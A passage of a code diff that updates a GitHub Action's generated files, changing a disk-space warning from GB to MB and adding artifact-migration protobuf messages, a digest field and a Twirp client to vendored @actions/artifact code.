,qBAAqB,KAAK,SAAS,EAAE,CAAC;YACxC,MAAM,IAAA,gCAAgB,EAAC,qBAAqB,CAAC,CAAC;QAChD,CAAC;QACD,OAAO;IACT,CAAC;AACH,CAAC;AAED,KAAK,UAAU,UAAU;IACvB,IAAI,CAAC;QACH,MAAM,GAAG,EAAE,CAAC;IACd,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,IAAI,CAAC,SAAS,CACZ,sCAAsC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CAC/D,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
lib/util.js (generated, 3 lines changed)
@@ -823,10 +823,11 @@ async function checkDiskUsage(logger) {
         return undefined;
     }
     const diskUsage = await (0, check_disk_space_1.default)(getRequiredEnvParam("GITHUB_WORKSPACE"));
+    const mbInBytes = 1024 * 1024;
     const gbInBytes = 1024 * 1024 * 1024;
     if (diskUsage.free < 2 * gbInBytes) {
         const message = "The Actions runner is running low on disk space " +
-            `(${(diskUsage.free / gbInBytes).toPrecision(4)} GB available).`;
+            `(${(diskUsage.free / mbInBytes).toPrecision(4)} MB available).`;
         if (process.env[environment_1.EnvVar.HAS_WARNED_ABOUT_DISK_SPACE] !== "true") {
             logger.warning(message);
         }
File diff suppressed because one or more lines are too long
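The util.js change only switches the units of the low-disk warning: free space below the 2 GB threshold is now reported in MB, which keeps the four significant digits useful for small values. A quick check of the formatting (free-byte count invented):

// Sketch of the reworded low-disk-space warning (free-byte count invented).
const mbInBytes = 1024 * 1024;
const gbInBytes = 1024 * 1024 * 1024;

const free = 1.5 * gbInBytes; // invented: a runner with 1.5 GB free
if (free < 2 * gbInBytes) {
    const message = "The Actions runner is running low on disk space " +
        `(${(free / mbInBytes).toPrecision(4)} MB available).`;
    console.log(message); // "... (1536 MB available)."
}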
node_modules/.bin/dot-object (generated, vendored, deleted)
@@ -1 +0,0 @@
-../dot-object/bin/dot-object
node_modules/.bin/protoc-gen-twirp_ts (generated, vendored, deleted)
@@ -1 +0,0 @@
-../twirp-ts/protoc-gen-twirp_ts
node_modules/.bin/tldts (generated, vendored, new symbolic link)
@@ -0,0 +1 @@
+../tldts/bin/cli.js
node_modules/.package-lock.json (generated, vendored, 2537 lines changed): file diff suppressed because it is too large
node_modules/@actions/artifact/lib/generated/index.d.ts (generated, vendored, 2 lines changed)
@@ -1,4 +1,4 @@
 export * from './google/protobuf/timestamp';
 export * from './google/protobuf/wrappers';
 export * from './results/api/v1/artifact';
-export * from './results/api/v1/artifact.twirp';
+export * from './results/api/v1/artifact.twirp-client';
node_modules/@actions/artifact/lib/generated/index.js (generated, vendored, 2 lines changed)
@@ -17,5 +17,5 @@ Object.defineProperty(exports, "__esModule", { value: true });
__exportStar(require("./google/protobuf/timestamp"), exports);
|
__exportStar(require("./google/protobuf/timestamp"), exports);
|
||||||
__exportStar(require("./google/protobuf/wrappers"), exports);
|
__exportStar(require("./google/protobuf/wrappers"), exports);
|
||||||
__exportStar(require("./results/api/v1/artifact"), exports);
|
__exportStar(require("./results/api/v1/artifact"), exports);
|
||||||
__exportStar(require("./results/api/v1/artifact.twirp"), exports);
|
__exportStar(require("./results/api/v1/artifact.twirp-client"), exports);
|
||||||
//# sourceMappingURL=index.js.map
|
//# sourceMappingURL=index.js.map
|
||||||
node_modules/@actions/artifact/lib/generated/index.js.map (generated, vendored)
@@ -1 +1 @@
{"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/generated/index.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;AAAA,8DAA2C;AAC3C,6DAA0C;AAC1C,4DAAyC;AACzC,kEAA+C"}
{"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/generated/index.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;AAAA,8DAA2C;AAC3C,6DAA0C;AAC1C,4DAAyC;AACzC,yEAAsD"}
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.d.ts (generated, vendored, 106 lines changed)
@@ -8,6 +8,66 @@ import { MessageType } from "@protobuf-ts/runtime";
 import { Int64Value } from "../../../google/protobuf/wrappers";
 import { StringValue } from "../../../google/protobuf/wrappers";
 import { Timestamp } from "../../../google/protobuf/timestamp";
+/**
+ * @generated from protobuf message github.actions.results.api.v1.MigrateArtifactRequest
+ */
+export interface MigrateArtifactRequest {
+    /**
+     * @generated from protobuf field: string workflow_run_backend_id = 1;
+     */
+    workflowRunBackendId: string;
+    /**
+     * @generated from protobuf field: string name = 2;
+     */
+    name: string;
+    /**
+     * @generated from protobuf field: google.protobuf.Timestamp expires_at = 3;
+     */
+    expiresAt?: Timestamp;
+}
+/**
+ * @generated from protobuf message github.actions.results.api.v1.MigrateArtifactResponse
+ */
+export interface MigrateArtifactResponse {
+    /**
+     * @generated from protobuf field: bool ok = 1;
+     */
+    ok: boolean;
+    /**
+     * @generated from protobuf field: string signed_upload_url = 2;
+     */
+    signedUploadUrl: string;
+}
+/**
+ * @generated from protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
+ */
+export interface FinalizeMigratedArtifactRequest {
+    /**
+     * @generated from protobuf field: string workflow_run_backend_id = 1;
+     */
+    workflowRunBackendId: string;
+    /**
+     * @generated from protobuf field: string name = 2;
+     */
+    name: string;
+    /**
+     * @generated from protobuf field: int64 size = 3;
+     */
+    size: string;
+}
+/**
+ * @generated from protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
+ */
+export interface FinalizeMigratedArtifactResponse {
+    /**
+     * @generated from protobuf field: bool ok = 1;
+     */
+    ok: boolean;
+    /**
+     * @generated from protobuf field: int64 artifact_id = 2;
+     */
+    artifactId: string;
+}
 /**
  * @generated from protobuf message github.actions.results.api.v1.CreateArtifactRequest
  */
@@ -162,6 +222,12 @@ export interface ListArtifactsResponse_MonolithArtifact {
      * @generated from protobuf field: google.protobuf.Timestamp created_at = 6;
      */
     createdAt?: Timestamp;
+    /**
+     * The SHA-256 digest of the artifact, calculated on upload for upload-artifact v4 & newer
+     *
+     * @generated from protobuf field: google.protobuf.StringValue digest = 7;
+     */
+    digest?: StringValue;
 }
 /**
  * @generated from protobuf message github.actions.results.api.v1.GetSignedArtifactURLRequest
@@ -219,6 +285,46 @@ export interface DeleteArtifactResponse {
      */
     artifactId: string;
 }
+declare class MigrateArtifactRequest$Type extends MessageType<MigrateArtifactRequest> {
+    constructor();
+    create(value?: PartialMessage<MigrateArtifactRequest>): MigrateArtifactRequest;
+    internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: MigrateArtifactRequest): MigrateArtifactRequest;
+    internalBinaryWrite(message: MigrateArtifactRequest, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactRequest
+ */
+export declare const MigrateArtifactRequest: MigrateArtifactRequest$Type;
+declare class MigrateArtifactResponse$Type extends MessageType<MigrateArtifactResponse> {
+    constructor();
+    create(value?: PartialMessage<MigrateArtifactResponse>): MigrateArtifactResponse;
+    internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: MigrateArtifactResponse): MigrateArtifactResponse;
+    internalBinaryWrite(message: MigrateArtifactResponse, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactResponse
+ */
+export declare const MigrateArtifactResponse: MigrateArtifactResponse$Type;
+declare class FinalizeMigratedArtifactRequest$Type extends MessageType<FinalizeMigratedArtifactRequest> {
+    constructor();
+    create(value?: PartialMessage<FinalizeMigratedArtifactRequest>): FinalizeMigratedArtifactRequest;
+    internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: FinalizeMigratedArtifactRequest): FinalizeMigratedArtifactRequest;
+    internalBinaryWrite(message: FinalizeMigratedArtifactRequest, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
+ */
+export declare const FinalizeMigratedArtifactRequest: FinalizeMigratedArtifactRequest$Type;
+declare class FinalizeMigratedArtifactResponse$Type extends MessageType<FinalizeMigratedArtifactResponse> {
+    constructor();
+    create(value?: PartialMessage<FinalizeMigratedArtifactResponse>): FinalizeMigratedArtifactResponse;
+    internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: FinalizeMigratedArtifactResponse): FinalizeMigratedArtifactResponse;
+    internalBinaryWrite(message: FinalizeMigratedArtifactResponse, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
+ */
+export declare const FinalizeMigratedArtifactResponse: FinalizeMigratedArtifactResponse$Type;
 declare class CreateArtifactRequest$Type extends MessageType<CreateArtifactRequest> {
     constructor();
     create(value?: PartialMessage<CreateArtifactRequest>): CreateArtifactRequest;
|
|||||||
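
The exported constants declared above are MessageType instances from @protobuf-ts/runtime, so the usual create/toBinary/fromBinary helpers apply to the new messages. A minimal round-trip sketch, again assuming direct imports of the vendored modules (paths and field values are illustrative):

    import { MigrateArtifactRequest } from "@actions/artifact/lib/generated/results/api/v1/artifact";
    import { Timestamp } from "@actions/artifact/lib/generated/google/protobuf/timestamp";

    // create() fills in defaults for any fields omitted from the partial.
    const req = MigrateArtifactRequest.create({
        workflowRunBackendId: "run-backend-id", // placeholder value
        name: "my-artifact",
        expiresAt: Timestamp.fromDate(new Date(Date.now() + 3600 * 1000)),
    });
    const bytes = MigrateArtifactRequest.toBinary(req);
    const decoded = MigrateArtifactRequest.fromBinary(bytes); // deep-equals req
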
245 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js (generated, vendored)
@@ -1,6 +1,6 @@
 "use strict";
 Object.defineProperty(exports, "__esModule", { value: true });
-exports.ArtifactService = exports.DeleteArtifactResponse = exports.DeleteArtifactRequest = exports.GetSignedArtifactURLResponse = exports.GetSignedArtifactURLRequest = exports.ListArtifactsResponse_MonolithArtifact = exports.ListArtifactsResponse = exports.ListArtifactsRequest = exports.FinalizeArtifactResponse = exports.FinalizeArtifactRequest = exports.CreateArtifactResponse = exports.CreateArtifactRequest = void 0;
+exports.ArtifactService = exports.DeleteArtifactResponse = exports.DeleteArtifactRequest = exports.GetSignedArtifactURLResponse = exports.GetSignedArtifactURLRequest = exports.ListArtifactsResponse_MonolithArtifact = exports.ListArtifactsResponse = exports.ListArtifactsRequest = exports.FinalizeArtifactResponse = exports.FinalizeArtifactRequest = exports.CreateArtifactResponse = exports.CreateArtifactRequest = exports.FinalizeMigratedArtifactResponse = exports.FinalizeMigratedArtifactRequest = exports.MigrateArtifactResponse = exports.MigrateArtifactRequest = void 0;
 // @generated by protobuf-ts 2.9.1 with parameter long_type_string,client_none,generate_dependencies
 // @generated from protobuf file "results/api/v1/artifact.proto" (package "github.actions.results.api.v1", syntax proto3)
 // tslint:disable
@@ -14,6 +14,236 @@ const wrappers_1 = require("../../../google/protobuf/wrappers");
 const wrappers_2 = require("../../../google/protobuf/wrappers");
 const timestamp_1 = require("../../../google/protobuf/timestamp");
 // @generated message type with reflection information, may provide speed optimized methods
+class MigrateArtifactRequest$Type extends runtime_5.MessageType {
+    constructor() {
+        super("github.actions.results.api.v1.MigrateArtifactRequest", [
+            { no: 1, name: "workflow_run_backend_id", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
+            { no: 2, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
+            { no: 3, name: "expires_at", kind: "message", T: () => timestamp_1.Timestamp }
+        ]);
+    }
+    create(value) {
+        const message = { workflowRunBackendId: "", name: "" };
+        globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
+        if (value !== undefined)
+            (0, runtime_3.reflectionMergePartial)(this, message, value);
+        return message;
+    }
+    internalBinaryRead(reader, length, options, target) {
+        let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
+        while (reader.pos < end) {
+            let [fieldNo, wireType] = reader.tag();
+            switch (fieldNo) {
+                case /* string workflow_run_backend_id */ 1:
+                    message.workflowRunBackendId = reader.string();
+                    break;
+                case /* string name */ 2:
+                    message.name = reader.string();
+                    break;
+                case /* google.protobuf.Timestamp expires_at */ 3:
+                    message.expiresAt = timestamp_1.Timestamp.internalBinaryRead(reader, reader.uint32(), options, message.expiresAt);
+                    break;
+                default:
+                    let u = options.readUnknownField;
+                    if (u === "throw")
+                        throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
+                    let d = reader.skip(wireType);
+                    if (u !== false)
+                        (u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
+            }
+        }
+        return message;
+    }
+    internalBinaryWrite(message, writer, options) {
+        /* string workflow_run_backend_id = 1; */
+        if (message.workflowRunBackendId !== "")
+            writer.tag(1, runtime_1.WireType.LengthDelimited).string(message.workflowRunBackendId);
+        /* string name = 2; */
+        if (message.name !== "")
+            writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.name);
+        /* google.protobuf.Timestamp expires_at = 3; */
+        if (message.expiresAt)
+            timestamp_1.Timestamp.internalBinaryWrite(message.expiresAt, writer.tag(3, runtime_1.WireType.LengthDelimited).fork(), options).join();
+        let u = options.writeUnknownFields;
+        if (u !== false)
+            (u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
+        return writer;
+    }
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactRequest
+ */
+exports.MigrateArtifactRequest = new MigrateArtifactRequest$Type();
+// @generated message type with reflection information, may provide speed optimized methods
+class MigrateArtifactResponse$Type extends runtime_5.MessageType {
+    constructor() {
+        super("github.actions.results.api.v1.MigrateArtifactResponse", [
+            { no: 1, name: "ok", kind: "scalar", T: 8 /*ScalarType.BOOL*/ },
+            { no: 2, name: "signed_upload_url", kind: "scalar", T: 9 /*ScalarType.STRING*/ }
+        ]);
+    }
+    create(value) {
+        const message = { ok: false, signedUploadUrl: "" };
+        globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
+        if (value !== undefined)
+            (0, runtime_3.reflectionMergePartial)(this, message, value);
+        return message;
+    }
+    internalBinaryRead(reader, length, options, target) {
+        let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
+        while (reader.pos < end) {
+            let [fieldNo, wireType] = reader.tag();
+            switch (fieldNo) {
+                case /* bool ok */ 1:
+                    message.ok = reader.bool();
+                    break;
+                case /* string signed_upload_url */ 2:
+                    message.signedUploadUrl = reader.string();
+                    break;
+                default:
+                    let u = options.readUnknownField;
+                    if (u === "throw")
+                        throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
+                    let d = reader.skip(wireType);
+                    if (u !== false)
+                        (u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
+            }
+        }
+        return message;
+    }
+    internalBinaryWrite(message, writer, options) {
+        /* bool ok = 1; */
+        if (message.ok !== false)
+            writer.tag(1, runtime_1.WireType.Varint).bool(message.ok);
+        /* string signed_upload_url = 2; */
+        if (message.signedUploadUrl !== "")
+            writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.signedUploadUrl);
+        let u = options.writeUnknownFields;
+        if (u !== false)
+            (u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
+        return writer;
+    }
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactResponse
+ */
+exports.MigrateArtifactResponse = new MigrateArtifactResponse$Type();
+// @generated message type with reflection information, may provide speed optimized methods
+class FinalizeMigratedArtifactRequest$Type extends runtime_5.MessageType {
+    constructor() {
+        super("github.actions.results.api.v1.FinalizeMigratedArtifactRequest", [
+            { no: 1, name: "workflow_run_backend_id", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
+            { no: 2, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
+            { no: 3, name: "size", kind: "scalar", T: 3 /*ScalarType.INT64*/ }
+        ]);
+    }
+    create(value) {
+        const message = { workflowRunBackendId: "", name: "", size: "0" };
+        globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
+        if (value !== undefined)
+            (0, runtime_3.reflectionMergePartial)(this, message, value);
+        return message;
+    }
+    internalBinaryRead(reader, length, options, target) {
+        let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
+        while (reader.pos < end) {
+            let [fieldNo, wireType] = reader.tag();
+            switch (fieldNo) {
+                case /* string workflow_run_backend_id */ 1:
+                    message.workflowRunBackendId = reader.string();
+                    break;
+                case /* string name */ 2:
+                    message.name = reader.string();
+                    break;
+                case /* int64 size */ 3:
+                    message.size = reader.int64().toString();
+                    break;
+                default:
+                    let u = options.readUnknownField;
+                    if (u === "throw")
+                        throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
+                    let d = reader.skip(wireType);
+                    if (u !== false)
+                        (u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
+            }
+        }
+        return message;
+    }
+    internalBinaryWrite(message, writer, options) {
+        /* string workflow_run_backend_id = 1; */
+        if (message.workflowRunBackendId !== "")
+            writer.tag(1, runtime_1.WireType.LengthDelimited).string(message.workflowRunBackendId);
+        /* string name = 2; */
+        if (message.name !== "")
+            writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.name);
+        /* int64 size = 3; */
+        if (message.size !== "0")
+            writer.tag(3, runtime_1.WireType.Varint).int64(message.size);
+        let u = options.writeUnknownFields;
+        if (u !== false)
+            (u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
+        return writer;
+    }
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
+ */
+exports.FinalizeMigratedArtifactRequest = new FinalizeMigratedArtifactRequest$Type();
+// @generated message type with reflection information, may provide speed optimized methods
+class FinalizeMigratedArtifactResponse$Type extends runtime_5.MessageType {
+    constructor() {
+        super("github.actions.results.api.v1.FinalizeMigratedArtifactResponse", [
+            { no: 1, name: "ok", kind: "scalar", T: 8 /*ScalarType.BOOL*/ },
+            { no: 2, name: "artifact_id", kind: "scalar", T: 3 /*ScalarType.INT64*/ }
+        ]);
+    }
+    create(value) {
+        const message = { ok: false, artifactId: "0" };
+        globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
+        if (value !== undefined)
+            (0, runtime_3.reflectionMergePartial)(this, message, value);
+        return message;
+    }
+    internalBinaryRead(reader, length, options, target) {
+        let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
+        while (reader.pos < end) {
+            let [fieldNo, wireType] = reader.tag();
+            switch (fieldNo) {
+                case /* bool ok */ 1:
+                    message.ok = reader.bool();
+                    break;
+                case /* int64 artifact_id */ 2:
+                    message.artifactId = reader.int64().toString();
+                    break;
+                default:
+                    let u = options.readUnknownField;
+                    if (u === "throw")
+                        throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
+                    let d = reader.skip(wireType);
+                    if (u !== false)
+                        (u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
+            }
+        }
+        return message;
+    }
+    internalBinaryWrite(message, writer, options) {
+        /* bool ok = 1; */
+        if (message.ok !== false)
+            writer.tag(1, runtime_1.WireType.Varint).bool(message.ok);
+        /* int64 artifact_id = 2; */
+        if (message.artifactId !== "0")
+            writer.tag(2, runtime_1.WireType.Varint).int64(message.artifactId);
+        let u = options.writeUnknownFields;
+        if (u !== false)
+            (u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
+        return writer;
+    }
+}
+/**
+ * @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
+ */
+exports.FinalizeMigratedArtifactResponse = new FinalizeMigratedArtifactResponse$Type();
+// @generated message type with reflection information, may provide speed optimized methods
 class CreateArtifactRequest$Type extends runtime_5.MessageType {
     constructor() {
         super("github.actions.results.api.v1.CreateArtifactRequest", [
@@ -395,7 +625,8 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
             { no: 3, name: "database_id", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
             { no: 4, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
             { no: 5, name: "size", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
-            { no: 6, name: "created_at", kind: "message", T: () => timestamp_1.Timestamp }
+            { no: 6, name: "created_at", kind: "message", T: () => timestamp_1.Timestamp },
+            { no: 7, name: "digest", kind: "message", T: () => wrappers_2.StringValue }
         ]);
     }
     create(value) {
@@ -428,6 +659,9 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
                 case /* google.protobuf.Timestamp created_at */ 6:
                     message.createdAt = timestamp_1.Timestamp.internalBinaryRead(reader, reader.uint32(), options, message.createdAt);
                     break;
+                case /* google.protobuf.StringValue digest */ 7:
+                    message.digest = wrappers_2.StringValue.internalBinaryRead(reader, reader.uint32(), options, message.digest);
+                    break;
                 default:
                     let u = options.readUnknownField;
                     if (u === "throw")
@@ -458,6 +692,9 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
         /* google.protobuf.Timestamp created_at = 6; */
         if (message.createdAt)
            timestamp_1.Timestamp.internalBinaryWrite(message.createdAt, writer.tag(6, runtime_1.WireType.LengthDelimited).fork(), options).join();
+        /* google.protobuf.StringValue digest = 7; */
+        if (message.digest)
+            wrappers_2.StringValue.internalBinaryWrite(message.digest, writer.tag(7, runtime_1.WireType.LengthDelimited).fork(), options).join();
         let u = options.writeUnknownFields;
         if (u !== false)
             (u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
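
Because digest is a google.protobuf.StringValue wrapper rather than a plain string, its absence is distinguishable from an empty string: as the branch above shows, the field is only written when message.digest is set. A small sketch of reading it defensively, assuming the same vendored import path as earlier:

    import { ListArtifactsResponse_MonolithArtifact } from "@actions/artifact/lib/generated/results/api/v1/artifact";

    function digestOf(artifact: ListArtifactsResponse_MonolithArtifact): string | undefined {
        // digest?: StringValue — undefined means the backend sent no digest
        // (e.g. an upload from a client older than upload-artifact v4).
        return artifact.digest?.value;
    }
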
@@ -699,6 +936,8 @@ exports.ArtifactService = new runtime_rpc_1.ServiceType("github.actions.results.
     { name: "FinalizeArtifact", options: {}, I: exports.FinalizeArtifactRequest, O: exports.FinalizeArtifactResponse },
     { name: "ListArtifacts", options: {}, I: exports.ListArtifactsRequest, O: exports.ListArtifactsResponse },
     { name: "GetSignedArtifactURL", options: {}, I: exports.GetSignedArtifactURLRequest, O: exports.GetSignedArtifactURLResponse },
-    { name: "DeleteArtifact", options: {}, I: exports.DeleteArtifactRequest, O: exports.DeleteArtifactResponse }
+    { name: "DeleteArtifact", options: {}, I: exports.DeleteArtifactRequest, O: exports.DeleteArtifactResponse },
+    { name: "MigrateArtifact", options: {}, I: exports.MigrateArtifactRequest, O: exports.MigrateArtifactResponse },
+    { name: "FinalizeMigratedArtifact", options: {}, I: exports.FinalizeMigratedArtifactRequest, O: exports.FinalizeMigratedArtifactResponse }
 ]);
 //# sourceMappingURL=artifact.js.map
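
The ServiceType registration above is what makes the two new methods visible to protobuf-ts tooling, but note that the vendored Twirp client added below only wraps the original five RPCs. If the backend exposes MigrateArtifact over standard Twirp routing, a hand-rolled JSON call might look roughly like the sketch below; the route shape follows the usual Twirp convention and the base URL, auth, and error handling are all assumptions, not part of this diff:

    import { MigrateArtifactRequest, MigrateArtifactResponse } from "@actions/artifact/lib/generated/results/api/v1/artifact";

    // Twirp routes are POST {base}/{package}.{Service}/{Method} with a JSON body.
    async function migrateArtifact(baseUrl: string, req: MigrateArtifactRequest): Promise<MigrateArtifactResponse> {
        const res = await fetch(`${baseUrl}/github.actions.results.api.v1.ArtifactService/MigrateArtifact`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify(MigrateArtifactRequest.toJson(req, { useProtoFieldName: true })),
        });
        return MigrateArtifactResponse.fromJson(await res.json(), { ignoreUnknownFields: true });
    }
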
2 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js.map (generated, vendored)
File diff suppressed because one or more lines are too long
30 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.d.ts (generated, vendored, new file)
@@ -0,0 +1,30 @@
+import { CreateArtifactRequest, CreateArtifactResponse, FinalizeArtifactRequest, FinalizeArtifactResponse, ListArtifactsRequest, ListArtifactsResponse, GetSignedArtifactURLRequest, GetSignedArtifactURLResponse, DeleteArtifactRequest, DeleteArtifactResponse } from "./artifact";
+interface Rpc {
+    request(service: string, method: string, contentType: "application/json" | "application/protobuf", data: object | Uint8Array): Promise<object | Uint8Array>;
+}
+export interface ArtifactServiceClient {
+    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
+    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
+    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
+    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
+    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
+}
+export declare class ArtifactServiceClientJSON implements ArtifactServiceClient {
+    private readonly rpc;
+    constructor(rpc: Rpc);
+    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
+    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
+    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
+    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
+    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
+}
+export declare class ArtifactServiceClientProtobuf implements ArtifactServiceClient {
+    private readonly rpc;
+    constructor(rpc: Rpc);
+    CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
+    FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
+    ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
+    GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
+    DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
+}
+export {};
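
The Rpc interface above is the only integration point the generated client needs. A minimal fetch-based implementation, sketched under the assumption of a JSON-only transport (a real transport would also have to handle the application/protobuf branch, auth headers, and Twirp error bodies; the base URL is a placeholder):

    // Placeholder endpoint; real callers would also attach authentication.
    const baseUrl = "https://results.example.invalid/twirp";

    const rpc = {
        async request(service: string, method: string, contentType: "application/json" | "application/protobuf", data: object | Uint8Array): Promise<object | Uint8Array> {
            if (contentType !== "application/json")
                throw new Error("this sketch only implements the JSON transport");
            const res = await fetch(`${baseUrl}/${service}/${method}`, {
                method: "POST",
                headers: { "Content-Type": contentType },
                body: JSON.stringify(data),
            });
            return (await res.json()) as object;
        },
    };
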
100 node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js (generated, vendored, new file)
@@ -0,0 +1,100 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.ArtifactServiceClientProtobuf = exports.ArtifactServiceClientJSON = void 0;
+const artifact_1 = require("./artifact");
+class ArtifactServiceClientJSON {
+    constructor(rpc) {
+        this.rpc = rpc;
+        this.CreateArtifact.bind(this);
+        this.FinalizeArtifact.bind(this);
+        this.ListArtifacts.bind(this);
+        this.GetSignedArtifactURL.bind(this);
+        this.DeleteArtifact.bind(this);
+    }
+    CreateArtifact(request) {
+        const data = artifact_1.CreateArtifactRequest.toJson(request, {
+            useProtoFieldName: true,
+            emitDefaultValues: false,
+        });
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/json", data);
+        return promise.then((data) => artifact_1.CreateArtifactResponse.fromJson(data, {
+            ignoreUnknownFields: true,
+        }));
+    }
+    FinalizeArtifact(request) {
+        const data = artifact_1.FinalizeArtifactRequest.toJson(request, {
+            useProtoFieldName: true,
+            emitDefaultValues: false,
+        });
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/json", data);
+        return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromJson(data, {
+            ignoreUnknownFields: true,
+        }));
+    }
+    ListArtifacts(request) {
+        const data = artifact_1.ListArtifactsRequest.toJson(request, {
+            useProtoFieldName: true,
+            emitDefaultValues: false,
+        });
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/json", data);
+        return promise.then((data) => artifact_1.ListArtifactsResponse.fromJson(data, { ignoreUnknownFields: true }));
+    }
+    GetSignedArtifactURL(request) {
+        const data = artifact_1.GetSignedArtifactURLRequest.toJson(request, {
+            useProtoFieldName: true,
+            emitDefaultValues: false,
+        });
+        const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/json", data);
+        return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromJson(data, {
+            ignoreUnknownFields: true,
+        }));
+    }
+    DeleteArtifact(request) {
+        const data = artifact_1.DeleteArtifactRequest.toJson(request, {
+            useProtoFieldName: true,
+            emitDefaultValues: false,
+        });
